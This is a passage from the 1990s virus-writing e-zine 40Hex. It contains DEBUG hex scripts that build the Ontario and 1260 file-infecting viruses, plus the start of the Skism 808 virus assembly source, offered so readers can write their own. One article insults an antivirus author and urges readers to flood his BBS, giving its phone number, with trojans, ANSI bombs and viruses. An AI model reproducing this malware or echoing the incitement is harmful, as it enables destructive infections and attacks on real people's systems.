    E 1f00  d4 ec 9a cb e1 fb d0 ec 9a d5 e7 9a cf ec fb ce

    E 1f10  ea f2 bc e6 fc bc fd f2 d9 89 82 bc ef f3 cf e1

    E 1f20  b0 91 e0 9a dd e4 9a bb d7 d1 f2 d3 c3 ea c6 c7

    E 1f30  bb 89 f3 d2 89 f2 dd e4 f8 c9 fb fd b8 1d b3 92

    E 1f40  b6 00 73 b4 94 63 bf dc b9 87 7d 9a 31 9f 68 5d

    E 1f50  01 04 8c 26 92 fa 89 5c 27 62 5b af bc 9c 56 45

    E 1f60  74 25 be 74 fd 5f 74 89 b9 0a d0 e9 3b f6 2e a6

    E 1f70  35 b3 02 ed e8 cf ee 74 d4 fb c7 cd 22 f9 f1 63

    E 1f80  ef 72 ce d7 56 e4 56 fb c4 3e d9 5b dd df ea 11

    E 1f90  e3 14 d7 7e 43 dd f1 61 ef 74 ce d4 df ce 7a 05

    E 1fa0  ea d7 f4 ec 5c fb c4 e2 c9 4d dd 37 31 fb ed 6a

    E 1fb0  08 e1 55 fc 26 13 e9 08 f8 e8 a1 f8 1a e8 a8 c6

    E 1fc0  d3 1c b9 ec f3 6d 47 f9 e0 63 d3 69 cc f3 45 fe

    E 1fd0  78 ea e3 14 26 5a df d5 53 16 83 dc 0f 76 03 fb

    E 1fe0  61 cd 0e e0 e8 78 f6 6b d7 54 f9 dd 6b c8 5c c4

    E 1ff0  e8 0c f6 a0 d6 ce c5 f5 51 e2 7a a6 3a 1b 69 c4

    E 2000  ed e9 b9 f4 89 f1 9a d6 08 10 3e 89 37 83 d9 0f

    E 2010  72 23 20 ff cd 15 f7 a5 fc 1c d1 cc e8 02 f8 5c

    E 2020  3e 80 da 10 80 0e 97 2f 36 b5 05 b3 1a 88 da 31

    E 2030  88 c9 3e 88 fa ce 8a f2 c2 28 9b e7 0b 19 fc 88

    E 2040  c9 3e b3 18 7c 25 e7 28 6d 3d 87 17 18 17 f2 31

    E 2050

    E 2060  a6 3c 10 22 1e 91 2f 36 3f 0d a9 1a 38 d1 86 0b

    E 2070  5a 84 17 18 10 f4 0e 58 2e f0 33 09 45 cf 4c ff

    E 2080  ce d3 ea 33 23 1e 95 05 83 32 dd d8 3a c7 1e e9

    E 2090  35 56 33 cb 96 f2 cb c0 17 35 73 2f 3d 83 28 a0

    E 20a0  24 27 fa fe c0 fb 83 cc e5 47 31 93 75 2f fa f2

    E 20b0  c0 eb 42 38 14 52 cd fb 89 cc 02 dc 7b a0 c6 fa

    E 20c0  eb 5f a5 d3 dc 7a a0 cb 7a 27 61 fb dd e9 f5 f5

    E 20d0  e8 56 f9 46 ac 71 f2 47 87 b9 6c 17 52 6b 9f 84

    E 20e0  ac e9 8a 6b 9f 86 ac cf 8d b3 17 8c e9 bd 8c b3

    E 20f0  18 a4 ae 99 fa ae 15 50 e6 17 50 0d 9a 8a 81 e9

    E 2100  88 ad 5b 29 af 99 d5 ee 17 48 a2 86 34 52 bf 33

    E 2110  2c 8a 03 5b 64 b9 77 71 e5 ad de f3 83 ef 06 9e

    E 2120  a2 01 76 3d 8e 20 56 24 9f 7f 23 cf 5d 03 ce 01

    E 2130  ea 74 90 ad 63 96 59 81 90 6b ea 74 8d 15 83 9c

    E 2140  4d e6 67 29 96 ac 81 19 9d 88 b4 0f a3 ab a7 17

    E 2150  92 0a bb a9 a7 2d 86 d3 81 78 7f 46 19 a5 7a b4

    E 2160  0f b3 4d a7 ab 28 fe 85 c0 3b d5 90 3a 5a 6f 0d

    E 2170  65 a3 7c 15 5b 71 0b df 1f a3 c7 1f fd 10 4f a4

    E 2180  c0 6b a0 91 d0 bb 20 c0 d9 3d 2d 02 fa e8 95 fa

    E 2190  39 18 23 21 06 9d 2d 36 e8 28 35 09 d6 d5 ce 21

    E 21a0  a8 09 d6 0c c9 b7 06 10 1a a2 10 22 a8 09 b2 1e

    E 21b0  12 1a f0 9a dd f0 32 dd 06 7d 86 18 2d b0 c0 75

    E 21c0  f9 1e 2b 3e 68 2d 21 f0 92 3e 22 d0 f6 ce 60 e9

    E 21d0  38 b3 48 30 50 8e 43 a5 99 a2 03 b3 6e 3e 43 a8

    E 21e0  76 b6 bb 97 10 a2 5b 23 65 5b 4b 64 5b 3a 86 ac

    E 21f0  c3 28 4b e8 6b fa 1a b2 a9 53 b4 d7 b0 b3 83 7c

    E 2200  e4 64 7c 07 65 c4 9c 26 27 96 8a 94 b3 d7 7c ca

    E 2210  87 8f bb 4b 5d 08 ec 2e 13 37 00 ba 3d 8f 20 9d

    E 2220  25 08 b0 60 03 3d 89 38 71 25 08 9a 0e 42 36 26

    E 2230  1d 13 72 24 d0 02 75 9a c1 14 fe 26 1c 1b 73 61

    E 2240  eb 2e 87 73 25 08 98 1e 44 36 2e ad 1d 64 03 3d

    E 2250  ff 10 9d 25 bb d0 89 e3 f7 40 2c d3 74 dc 48 53

    E 2260  9f 37 00 0f d8 2e 16 14 43 c4 e9 e8 26 13 5b a5

    E 2270  d0 14 08 9b 07 af fb c3 af d6 5b 75 aa 24 26 3d

    E 2280  80 11 71 43 c4 ea 89 ce d0 9c 08 9c 06 a8 36 2e

    E 2290  85 73 25 08 9a 1e 44 36 2e af 1d 64 03 35 3b ac

    E 22a0  1c 32 54 f0 53 9e 12 00 25 d2 29 e5 50 40 2c d3

    E 22b0  74 dc 3d 8b 29 21 ed 65 10 0f 08 28 07 54 d4 f8

    E 22c0  dc 3d a1 46 36 2e ad 0d 62 03 3d 8b 28 77 25 08

    E 22d0  ec 36 a8 36 9d e5 46 89 c3 43 81 58 17 00 e6 60

    E 22e0  0c 08 b2 47 02 2a 46 22 65 03 7e 4e cf 08 93 3e

    E 22f0  76 37 01 52 35 8b 60 17 2e 85 3c 24 ad 55 02 08

    E 2300  b0 2d 02 61 0f 7e 4e 2e ad 35 df 02 3d 8e 30 ce

    E 2310  24 cf 6a fe a7 75 06 d9 ed eb e9 3d fe 28 42 24

    E 2320  53 db 81 40 15 ff d8 fb 61 c4 ef 1e c4 f7 40 08

    E 2330  b1 4e 04 3d a2 4f 31 b0 25 fb 7d c4 15 1f af c9

    E 2340  b0 27 fb 27 27 f9 72 c7 fb c4 c7 fb 89 c7 fb 35

    E 2350  c1 4b 5d 75 42 bb ba 30 b9 72 13 2e a6 24 d6 65

    E 2360  f1 f9 7f 48 cf cd 3d 80 28 8f 23 26 67 11 75 42

    E 2370  bb ba 30 b9 72 13 2e a6 24 d6 65 f1 f9 7f 48 e9

    E 2380  2d e8 34 ce ae e7 35 83 78 8a 83 78 d7 83 0c 98

    E 2390  7c 8e 35 a6 78 86 83 78 59 7d 84 e9 af 2e af 25

    E 23a0  75 03 3d 89 18 64 25 08 9f 1e 5d 36 2e aa 15 7d

    E 23b0  03 3d a3 5f 36 2e af 1d 7f 03 3d 89 38 92 25 08

    E 23c0  9a 16 b6 36 c3 ce 12 e8 5f f4 22 2b f6 c3 d4 a0

    E 23d0  7d 0e 30 c9 15 9d 28 25 01 f1 92 1b 0d 87 38 8b

    E 23e0  2e 96 49 d4 59 ef dd f6 97 2b f6 91 d5 3d c3 ce

    E 23f0  42 e7 a0 ad 90 11 b3 3f bd 83 32 9e d0 9b ab 76

    E 2400  30 5b 8b 35 86 ab be b6 96 a0 df 89 cd 81 8b 35

    E 2410  86 a3 be b6 96 a0 df 89 cd 95 83 30 9e d0 9b b6

    E 2420  26 a0 19 88 57 d7 ad e5 70 bc 5f 70 4c 5e 70 24

    E 2430  5e b6 26 a0 19 88 90 16 ab c3 bd 31 90 67 b3 3d

    E 2440  bd 45 46 78 19 ef b6 52 a8 fe 88 30 5b 8b 79 9e

    E 2450  a1 be 67 52 98 5f ab b4 98 ad be 70 f1 5e 70 91

    E 2460  41 21 28 af 23 e2 be 20 af b6 b6 a4 b9 1b 6e bc

    E 2470  7a 55 56 97 ad 71 70 bd 40 1f d0 e8 08 93 0f 33

    E 2480  50 e2 df d8 2e 87 6a 25 08 9d 06 5b 36 2e a8 0d

    E 2490  7b 03 3d 8b 10 66 25 08 98 3e 51 36 2e ad 1d 7f

    E 24a0  03 3d 8b 38 92 25 08 98 16 b6 36 c3 26 42 53 9d

    E 24b0  33 00 9f 96 23 db aa d8 0b 81 37 26 13 83 c3 03

    E 24c0  e2 f7 8b cb 59 8b d9 59 b4 60 eb 1d 56 e8 02 00

    E 24d0  45 69 5a 0e 81 ea a0 23 1f b9 d8 0b 87 d6 81 34

    E 24e0  26 13 83 c6 03 e2 f7 eb 08 80 ec 20 e8 89 01 eb

    E 24f0  db 81 ee 75 ff 80 3c 01 75 02 5e c3 06 1f e9 30

    E 2500  dc 00 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a


    RCX
2402
W
Q


    ------------------------------------------------------------------------------


      hr



40hEX vOLUME 1 iSSUE 20007


      nOW A WORD FROM A REAL DICK



      wHEN sss TOLD ME HOW MUCH OF A DICK THIS GUY i'M ABOUT TO TELL YOU

      ABOUT IS i DIDN'T BELIVE HIM.  hIS NAME WILL BE KEPT, BECAUSE IF WE

      MENTION IT HE'LL GET ALL SOUPED AND THINK HE'S PUBLIC ENEMY NUMBER

      ONE IN THE VIRUS COMMUNITY.


      wHO HE IS, IS THE AUTHOR OF A VERY SAD ANTI-VIRUS PROGRAM AND VIRUS

      SCANNER CALLED flu-shot AND vir-x, RESPECTIVLY.  wHAT THE MAN IS,

      IS A SAD CASE WHO WALLOWS IN THE SHADOW OF jOHN mCaFFE AND CURSES

      TO HIS BITTER SELF WHY HE IS NOT A POPULAR ANTI-VIRUS AUTHOR.  tHE

      REASON IS SIMPLE.  hIS PRODUCT SUCKS.  wELL LETS PUT IT THIS WAY,

      HIS SELF PROCLAIMED 'GREAT' SCANNER FAILS TO DETECT OVER 60% OF ALL

      VIRUSES OUT THERE.  oN TOP OF THAT, IT WAS VERY SINPLE FOR A

      PERSON, WHO SHALL REMAIN NAMELESS, TO INFECT HIS VIRUS SCANNER, AND

      SEND OUT TROJAN COPIES ALL OVER THE usa.tHE PRODUCT, flu-shot, IS

      THE MOST ANNOYING, FALSE-ALARM CAUSING, PIECE OF TRASH ON THE MARKET.
      nUFF SAID ON THE SUBJECT.



      wHAT MAKES US TO PISSED AT SAID ASSHOLE?  wELL, TAKE INTO MIND THE

      FOLLOWING, FROM THE DOCUMENTATION OF flu-shot.
      ------------------------------------------------------------------------------
       tHE cHALLENGE TO THE wORM

       =========================
       wHEN i FIRST RELEASED A PROGRAM TO TRY TO THWART THEIR DEMENTED 

       LITTLE EFFORTS,i PUBLISHED THIS LETTER IN THE ARCHIVE (STILL IN 

       THE flu_shot+ ARCHIVE OF WHICH THIS IS A PART OF).  wHAT i SAY IN 

       IT STILL HOLDS:


       aS FOR THE DESIGNER OF THE VIRUS PROGRAM: MOST 

       LIKELY AN IMPOTENT ADOLESCENT, INCAPABLE OF 

       NORMAL SOCIAL RELATIONSHIPS, AND ATTEMPTING TO 

       PROVE THEIR OWN WORTH TO THEMSELVES THROUGH 

       THESE TYPE OF TERRORIST ATTACKS.


       nEVER SUCCEEDING IN THAT TASK (OR IN ANY 

       OTHER), SINCE THEY HAVE NO WORTH, THEY WILL ONE 

       DAY TAKE A LOOK AT THEMSELVES AND WHAT THEY'VE 

       DONE IN THEIR PAST, AND KILL THEMSELVES IN 

       DISGUST.  tHIS IS A gOOD tHING, SINCE IT SAVES 

       THE TAXPAYERS' MONEY WHICH NORMALLY WOULD BE 

       WASTED ON THERAPY AND TREATMENT OF THIS MISCREANT.
       iF THEY *REALLY* WANT A CHALLENGE, THEY'LL TRY 

       TO DESTROY *MY* HARD DISK ON MY bbs, INSTEAD OF 

       THE DISK OF SOME INNOCENT PERSON.  i CHALLENGE 

       THEM TO UPLOAD A VIRUS OR OTHER tROJAN HORSE TO 

       MY bbs THAT i CAN'T DISARM.  iT IS DOUBTFUL THE 

       CHALLENGE WILL BE TAKEN: THE PROFILE OF SUCH A 

       PERSON PROHIBITS THEM FROM ATTACKING THOSE WHO 

       CAN FIGHT BACK.  aLAS, HAVING A GO WITH THIS  

       LOWLIFE WOULD BE AMUSING FOR THE FIVE MINUTES 

       IT TAKES TO DISARM WHATEVER THEY INVENT.


       gO AHEAD, YOU GOOD-FOR-NOTHING LITTLE 

       SLIMEBUCKET:  MAKE *MY* DAY!


------------------------------------------------------------------------------


fUNNY ISEN'T IT?  wELL mR. dICKBURG, i AM NOT AN ADOLESENT, NOR AM

i IMPOTENT.  i LEAD QUITE A HEALTY SOCIAL LIFE, AND HAVE NO SUCIDAL

URGES.  wHAT i AM IS A PERSON WHO (MABEY BECAUSE OF SOME DEEP DOWN

PSYCOLOGICAL DISORDER) FINDS JOY IN SEEING SOME GEEKED OUT,

COMPUTER NERDS SYSTEM GO DOWN THE DRAIN IN A FLASH.


oH YES THERE ARE OTHERS LIKE ME OUT THERE, MANY OTHERS.  iT (VIRUS

WRITING) IS A JOKE.  iT IS DONE FOR A GOOD LAUGH, TO SEE DICKHEADS

LIKE YOU LOSE TIME AND MONEY.  sO MY FRIEND, AT THIS TIME i START

AN ACTIVE CAMPAIN AFTER YOU ASS.


aNYONE OUT THERE WHO WANTS TO MAKE SOME DICKS DAY, CALL THIS

ASSHOLES CHEAP bbs AND LETS TAKE HIM DOWN.   tHE NUMBER IS

(212)-889-6438.   tROJANS, aNSI-bOMBS, AND ALL vIRUSES ARE ACEPTED.

gO TO IT!








40hEX vOLUME 1 iSSUE 20008


tHE oNTARIO vIRUS




hERE A QUICK NICE LITTLE VIRUS FROM OUR BOYZ UP NORTH.
sTATUS:    rARE

dISCOVERED:  jULY, 1990

sYMPTOMS:    .com & .exe GROWTH; DECREASE IN SYSTEM AND FREE MEMORY;

              HARD DISK ERRORS IN THE CASE OF EXTREME INFECTIONS

oRIGIN:      oNTARIO, cANADA

eFF lENGTH:  512 bYTES

tYPE cODE:   prTak - pARASITIC eNCRYPTED rESIDENT .com & .exe iNFECTOR

dETECTION mETHOD:  vIRUsCAN v66+, pRO-sCAN 2.01+, nav

rEMOVAL iNSTRUCTIONS:  scan /d, OR dELETE INFECTED FILES

gENERAL cOMMENTS:

tHE oNTARIO vIRUS WAS ISOLATED BY mIKE sHIELDS IN oNTARIO, cANADA

IN jULY, 1990.  tHE oNTARIO VIRUS IS A MEMORY RESIDENT INFECTOR OF

.com, .exe, AND OVERLAY FILES.  iT WILL INFECT command.com.


tHE FIRST TIME A PROGRAM INFECTED WITH THE oNTARIO vIRUS IS EXECUTED,

IT WILL INSTALL ITSELF MEMORY RESIDENT ABOVE THE TOP OF SYSTEM MEMORY

BUT BELOW THE 640k dos BOUNDARY.  tOTAL SYSTEM MEMORY AND FREE MEMORY

WILL BE DECREASED BY 2,048 BYTES.  aT THIS TIME, THE VIRUS WIL

INFECT command.com ON THE c: DRIVE, INCREASING ITS LENGTH BY 512 BYTES.


eACH TIME AN UNINFECTED PROGRAM IS EXECUTED ON THE SYSTEM WITH THE

VIRUS MEMORY RESIDENT, THE PROGRAM WILL BECOME INFECTED WITH THE VIRAL

CODE LOCATED AT THE END OF THE FILE.  fOR .com FILES, THEY WILL

INCREASE BY 512 BYTES IN ALL CASES.  fOR .exe AND OVERLAY FILES, THE

FILE LENGTH INCREASE WILL BE 512 - 1023 BYTES.  tHE DIFFERENCE IN

LENGTH FOR .exe AND OVERLAY FILES IS BECAUSE THE VIRUS WILL FILL OUT

THE UNUSED SPACE AT THE END OF THE LAST SECTOR OF THE UNINFECTED FILE

WITH RANDOM DATA (USUALLY A PORTION OF THE DIRECTORY) AND THEN APPEND

ITSELF TO THE END OF THE FILE AT THE NEXT SECTOR.  sYSTEMS USING

A SECTOR SIZE OF MORE THAN 512 BYTES MAY NOTICE LARGER FILE INCREASES

FOR INFECTED FILES.  iNFECTED FILES WILL ALWAYS HAVE A FILE LENGTH

THAT IS A MULTIPLE OF THE SECTOR SIZE ON THE DISK.


iN THE CASE OF EXTREME INFECTIONS OF THE oNTARIO vIRUS, HARD DISK

ERRORS MAY BE NOTICED.


oNTARIO USES A COMPLEX ENCRYPTION ROUTINE, AND A SIMPLE IDENTIFICATION

STRING WILL NOT IDENTIFY THIS VIRUS.



------------------------------------------------------------------------------


N ONTARIO.COM

E 0100  e9 1d 00 1d 66 65 63 74 65 64 20 50 72 6f 67 72

E 0110  61 6d 2e 20 0d 0a 24 ba 02 01 b4 09 cd 21 cd 20

E 0120  90 e8 e9 01 93 84 7b d9 f8 69 7c 3c 84 7b b6 a5

E 0130  71 60 0f cb 65 b7 bb 0a a3 07 55 97 7f 86 be 9a

E 0140  ff 84 55 0d e5 84 79 aa f7 1a 79 86 f7 47 30 0a

E 0150  a0 05 55 87 7b 04 7b 25 69 84 56 04 7b 27 69 84

E 0160  f5 44 75 9b f0 71 48 7b c2 80 79 78 88 20 f5 5d

E 0170  81 43 7d 00 7b fb 7b 27 fd 84 80 3c 84 cf b6 a5

E 0180  64 9a 7c 8f 96 f0 77 09 cd ff 7b 3b 7b 85 2c 78

E 0190   e 21 b8 08 bb aa 7a 82 06 84 91 6f 6e cd 15 b9

E 01a0  84 7b 0e 86 3b 4b fb 78 30 f1 6f b8 78 f0 6b b8

E 01b0  84 f1 72 8a 64 3e a6 85 93 8d 7b 4b 93 81 7b aa

E 01c0  84 aa 7b 86 7d 9a 29 d5 28 d4 c3 84 38 6c 5d 85

E 01d0  09 9c 8d 45 7a f0 70 04 9a 7a c3 85 38 6c 6d 85

E 01e0  09 8c c3 86 46 6c 75 85 08 87 92 86 7a 0f a3 8a

E 01f0  64 3c 7b d3 93 7b 7b 0d 75 80 79 0d 6d 82 79 3e

E 0200  73 86 c2 9f 7b 30 44 6c 97 84 09 cc fa ba 73 86

E 0210  36 de 0f bd db 8d 79 be 7d 8f 79 f0 4c b7 a9 b7

E 0220  b2 3c 79 c6 93 4b 7b f6 50 b9 7b 64 0c a2 2b 25

E 0230  3  86 d8 ff 7b 25 71 86 d8 f9 7b dc 56 87 7b 42

E 0240  7d 8c 79 6d d8 8d 79 26 70 86 90 cd eb 07 45 98

E 0250  79 85 0e 87 92 01 7b 25 77 86 c2 84 79 73 9a d4

E 0260  29 35 7f 57 b1 57 93 87 b9 af 7d 94 79 d4 da 98

E 0270  79 27 00 84 da 9a 79 81 6b 84 d8 f9 7b dc d8 9a

E 0280  79 43 7d 98 79 85 7b 7b 7d 88 79 dd 21 3c 7b c6

E 0290  93 e7 7b f6 3c 04 4d 7c 7a 8c 48 44 f5 5c db e8

E 02a0  7f 8a 64 8a 7c 26 97 85 48 72 c4 a0 79 d3 c2 84

E 02b0  79 78 88 20 c5 ac 79 6c 21 84 21 3d 7b 86 cf c4

E 02c0  b7 7b f6 6c b7 b2 b7 a9 3c 7b c6 93 a3 7b f6

E 02d0  70 3e 73 86 c2 9f 7b 30 3b 6c 61 84 f0 92 7d 86

E 02e0  f0 8a 7f 86 c3 85 2c 6c 77 84 cf ba 93 83 7b dc

E 02f0  20 dd 21 9b 7c 47 e7 aa 84 9a 7b 86 b8 c7 41 d8

E 0300  38 cb 36 c9 3a ca 3f aa 38 cb 36 84 84 5e 56 2e

E 0310  8a 84 e8 01 b9 e8 01 f6 d0 2e 30 04 46 e2 f8 c3


RCX
220
W
Q


------------------------------------------------------------------------------




  hr
40hEX vOLUME 1 iSSUE 20009


  tHE 1260 vIRUS


  hERE'S A NICE LITTLE ENCRYPTING VIRUS WRITTEN IN aMERICA.


  aLIASES:     v2p1

  v sTATUS:    rESEARCH

  dISCOVERY:   jANUARY, 1990

  sYMPTOMS:    .com FILE GROWTH

  oRIGIN:      mINNESOTA, usa

  eFF lENGTH:  1,260 bYTES

  tYPE cODE:   pnc - pARASITIC eNCRYPTING nON-rESIDENT .com iNFECTOR

  dETECTION mETHOD:  vIRUsCAN v57+, ibm sCAN, pRO-sCAN 1.4+, f-pROT 1.12+,

                avtk 3.5+, vIRhUNT 2.0+, nav

 rEMOVAL iNSTRUCTIONS: cLEANuP v57+, pRO-sCAN 1.4+, f-pROT 1.12+, vIRhUNT 2.0+

 gENERAL cOMMENTS:
 tHE 1260 VIRUS WAS FIRST ISOLATED IN jANUARY, 1990.  tHIS

         VIRUS DOES NOT INSTALL ITSELF RESIDENT IN MEMORY, BUT IS IT

         EXTREMELY VIRULENT AT INFECTING .com FILES.  iNFECTED FILES

         WILL HAVE THEIR LENGTH INCREASED BY 1,260 BYTES, AND THE

         RESULTING FILE WILL BE ENCRYPTED.  tHE ENCRYPTION KEY CHANGES

         WITH EACH INFECTION WHICH OCCURS.


         tHE 1260 VIRUS IS DERIVED FROM THE ORIGINAL vIENNA vIRUS, THOUGH

         IT IS HIGHLY MODIFIED.


         tHIS VIRUS WAS DEVELOPED AS A RESEARCH VIRUS BY mARK wASHBURN, WHO

         WISHED TO SHOW THE ANTI-VIRAL COMMUNITY WHY IDENTIFICATION STRING

         SCANNERS DO NOT WORK IN ALL CASES.  tHE ENCRYPTION USED IN 1260 IS

         ONE OF MANY POSSIBLE CASES OF THE ENCRYPTION WHICH MAY OCCUR WITH

         wASHBURN'S LATER RESEARCH VIRUS, v2p2.



         -----------------------------------------------------------------
N 1260.COM

E 0100  e9 1d 00 6e 66 65 63 74 65 64 20 50 72 6f 67 72

E 0110  61 6d 2e 20 0d 0a 24 ba 02 01 b4 09 cd 21 cd 20

E 0120  90 b8 89 86 4b b9 fd 04 fc 46 bf 47 01 90 2b da

E 0130  31 0d 33 d1 2b d8 31 05 47 42 4b 40 90 e2 ee 4b

E 0140  4b 42 47 43 42 f8 47 ff 18 71 18 d2 a5 40 19 e2

E 0150  6d b4 08 f8 5c fa f4 a6 eb 08 55 f2 f4 73 82 1a

E 0160  65 c4 c4 4f 82 24 55 fa f4 7b b2 16 55 f4 e4 6f

E 0170  a2 00 1f f9 0c c2 f7 7d 06 73 32 66 f4 45 84 87

E 0180  3d 81 84 7a 77 5e 7f 04 40 c2 39 d7 c8 fa 28 c1

E 0190  b6 e1 0d 64 e6 fc 40 d9 39 d3 38 fa 71 a4 38 0a

E 01a0  6b e1 82 38 c3 71 22 77 36 13 f4 42 ee 37 c5 e0

E 01b0  b2 6c e2 ca e4 45 f4 f6 aa a4 75 30 68 fa a8 be

E 01c0  05 83 f7 a9 bc ff f5 5b 5b 86 18 15 0f a5 e2 6e

E 01d0  9b 17 6e 39 64 3d 54 f7 7e 0d 1e cd 65 37 46 b9

E 01e0  31 c3 b0 c3 2c df f7 3b eb a5 d3 79 eb d7 e5 6c

E 01f0  1b c5 6e 91 11 7a 32 56 f5 5f c9 cc 81 f0 b9 87

E 0200  f1 87 2f 6c 71 37 4b f7 f5 a8 ea 7e 83 0f 65 1a

E 0210  1a 97 e6 57 b9 51 7c 89 07 78 06 76 33 6d c5 7e

E 0220   3 c3 36 63 4e 08 41 b9 7e 25 74 35 54 fb 5c e4

E 0230  e5 2e c4 0c e3 6b 39 43 ba 3e d4 84 f6 10 9a cb

E 0240  8e 87 f2 07 21 e4 ce ef 86 19 73 4c 09 fc e2 18

E 0250  96 01 61 5c 19 fc f8 84 2c 7f 8c 02 a4 7d 04 3f

E 0260  c2 68 68 fc c2 89 08 ae 4a f4 b1 7b 24 7d 20 41

E 0270  e2 29 c3 69 ac 0a 4a f1 b1 75 13 0e 0d 77 54 01

E 0280  40 25 82 4d a3 44 f0 cd 79 22 73 32 53 fc 2f c1

E 0290  91 e0 0b 88 e3 30 79 28 4a f4 a5 3d d3 75 8c 38

E 02a0  4b 92 38 74 fd 45 f1 f0 79 22 73 32 62 fc 2f c1

E 02b0   e bf cb fa 2e 09 3a f3 f2 38 b0 c7 e3 30 7a cf

E 02c0  0f 49 c1 3e 85 f3 fd 45 fd fb 30 de 8e f0 04 fa

E 02d0  ec 27 67 36 21 2c a9 37 ac 37 78 57 fe f3 01 2f

E 02e0  a4 4f 59 cf 4c 32 20 fb 31 9f 12 01 31 87 18 00

E 02f0  42 e8 21 7d f6 fe 49 d3 30 da ce 2e 31 0d fa d9

E 0300  7d 47 4c a6 a9 f2 31 37 be bd 0d 33 1a 31 12 ef

E 0310  21 cf cc 2a e9 3f 31 ba bb 13 31 78 f3 77 ca cf

E 0320  94 07 cd 4e 0c d4 fc 76 71 fa fd 33 6d 8b 17 ef

E 0330  66 ad 1d 23 d3 44 bb 15 74 7f f9 ff 31 1a 6f f1

E 0340  c1 08 8f e0 d0 f0 30 2e a7 24 7d 3d db f2 2b a8

E 0350  0a ed ec 06 f8 f3 75 80 12 7b 3f ee fc 3e ea 2f

E 0360  8a 2c 4f ce 00 be 58 ff fd 7b 3f ee fc 3e 5b b1

E 0370  14 ea 55 ec ec 79 8a 12 30 00 87 38 d9 f2 7f 2a

E 0380  07 cc 62 a5 4b bd 56 75 b2 16 7d 17 4a f1 d7 21

E 0390  98 e3 56 ee ec 1a 4a fe 17 17 30 75 8a 1e 9a 45

E 03a0  32 06 6d d6 f5 f2 7d 38 ab fa 30 c2 41 35 e2 ec

E 03b0  67 3d 1f 4a b2 a9 14 6c fc ff fa fe ac 0d ee c3

E 03c0  e4 90 2e 32 e1 f7 31 9c eb e7 45 ff bf 4a ed ef

E 03d0  07 eb ed 22 cc 81 f2 4b bd 42 fe ff 31 27 92 19

E 03e0  4c 09 5e cf 00 d2 76 a9 07 70 b3 07 7c 12 0d 10

E 03f0  6c 22 f2 ef 55 f2 aa 32 dc 4f c3 32 dc 4b 8c cc

E 0400  06 c5 7b 04 5b 72 3f 5e fd 36 dc e1 76 a5 11 61

E 0410  b3 15 59 f5 20 d2 e2 a6 ce 3b ce 24 ce 21 fe 39

E 0420  46 2e 72 cf cc a4 15 51 fd 38 76 b1 0d 72 1c d3

E 0430  6c 6a 2c a7 7f 22 34 2e 34 2a 34 76 b3 03 8c ee

E 0440  0a 0b 5c 4e 3e 33 07 2f 2e a1 3d a4 ae 33 06 35

E 0450  11 6d 3e 99 17 fb 2e 77 3f 29 1e ac 29 7b 06 94

E 0460  8e 1f cd 8a 22 7b 0e 0f 5a 3b 44 fc fe 18 30 13

E 0470  5a 2a cd aa 08 cb b8 1a 8b 0b 3d af 75 2c de da

E 0480  05 ff 8c 73 c9 f2 77 8a 1a 54 ce f8 74 b7 e9 e0

E 0490  ef 60 a9 eb b0 a8 a5 33 ad 73 22 ac a8 7b b8 28

E 04a0  62 f8 ca 46 89 f7 da 02 76 bf f9 a2 a6 ab 21 70

E 04b0  f0 b8 56 ec ee a0 e1 77 b8 14 d3 7e fe 0a ad 03

E 04c0  0d 80 4b e3 20 96 fd 5c f9 fb f3 a7 5e f5 ed 4c

E 04d0  e3 eb 16 b7 f2 6e 3e 63 e3 ab 45 ff fd a3 d2 44

E 04e0  8b 2b 37 6c c1 f3 76 b9 21 58 f9 ff 76 b5 33 4c

E 04f0  eb eb 66 a9 0f 50 f3 ff 06 a3 e2 62 3e 4c ca 8e

E 0500  05 02 0b 36 70 f7 05 03 bb b0 6d ce f8 c2 e0 dc

E 0510  3c d8 34 c4 35 d8 24 d4 27 6b bd b8 be b5 8f 37

E 0520  86 5b 2f 28 ce f3 fe fc fe fd fc f6 fc f9 ec e4

E 0530  ec e7 ec e2 ef fd ff ef ff e9 ff eb ff e5 0f 17

E 0540  0f 11 0c 13 0c ee fd e0 fd e5 fd de fd d3 ed cc

E 0550  ed c9 ed ca 67 bc 14 75 ba 10 77 00 7d 1d 7a cd

E 0560  24 eb cc 7a 8c 4b 10 fa 77 2c 7d 14 21 f1 21 cf

E 0570  70 ba 67 a0 04 79 ba 14 77 04 7d 11 4a f1 64 8d

E 0580  8c d2 11 4d bd f7 cd f3 bc bd 1e 06 3f 19 f9 a7

E 0590  05 f7 ec c4 c2 b1 b3 b3 fc aa bd aa b4 cf 98 87

E 05a0  82 93 e2 8d 83 bf fc b3 fc fa fc fe fc f2 ec ee

E 05b0  ec ea ec ee ec f2 fc fe fc fa fc fe fc f2 0c 0f

E 05c0  0d 0b 0d 0f 0d f3 fd ff fd fb fd ff fd f3 ed ef

E 05d0  ed eb ed ef ed f3 fd ff fd fb fd ff fd f3 cf f0

E 05e0  f2 f4 f2 f0 f2 cc c2 bc b2 b6 fe fc fd f3 ed ef

E 05f0  ed eb ed cf ca 97 a6 ed dd fb fd ff a9 ba c3 d6

E 0600  a3 c8 c2 c2 8d be fd b2 fd fb fd ff 1a 1a 1a 1a


RCX
50c
W
Q


----------------------------------------------------------------------------

             hr
40hEX vOLUME 1 iSSUE 20010


             tHE 808 vIR


             hERE ANOTHER VIRUS FROM sKISM.  iT'S A QUICK OVERWRITING VIRUS BUT

             YOU CAN USE THE SOURCE CODE TO WRITE YOUR OWN VIRUSES.


------------------------------------------------------------------------------


;tHE sKISM 808 vIRUS.  cREATED 1991 BY sMART kIDS iNTO sICK mETHODS.




FILENAME   equ      30       ;USED TO FIND FILE NAME

FILEATTR   equ      21                 ;USED TO FIND FILE ATTRIBUTES

FILEDATE   equ      24                 ;USED TO FIND FILE DATE

FILETIME   equ      22                 ;USED TO FIND FILE TIME




CODE_START equ      0100H              ;START OF ALL .com FILES

VIRUS_SIZE equ      808                ;tr 808



CODE     SEGMENT  'CODE'
ASSUME   CS:CODE,DS:CODE,ES:CODE

ORG      CODE_START


MAIN PROC   NEAR


JMP    VIRUS_START


ENCRYPT_VAL    DB  00H


VIRUS_START:

     CALL     ENCRYPT                  ;ENCRYPT/DECRYPT FILE

                   JMP      VIRUS                    ;GO TO START OF CODE


ENCRYPT:
                   PUSH     CX
                   MOV      BX,OFFSET VIRUS_CODE     ;START ENCRYPTION AT DATA
     XOR_LOOP:     MOV      CH,[BX]                  ;READ CURRENT BYTE

                   XOR      CH,ENCRYPT_VAL           ;GET ENCRYPTION KEY

                   MOV      [BX],CH                  ;SWITCH BYTES

                   INC      BX                       ;MOVE BX UP A BYTE

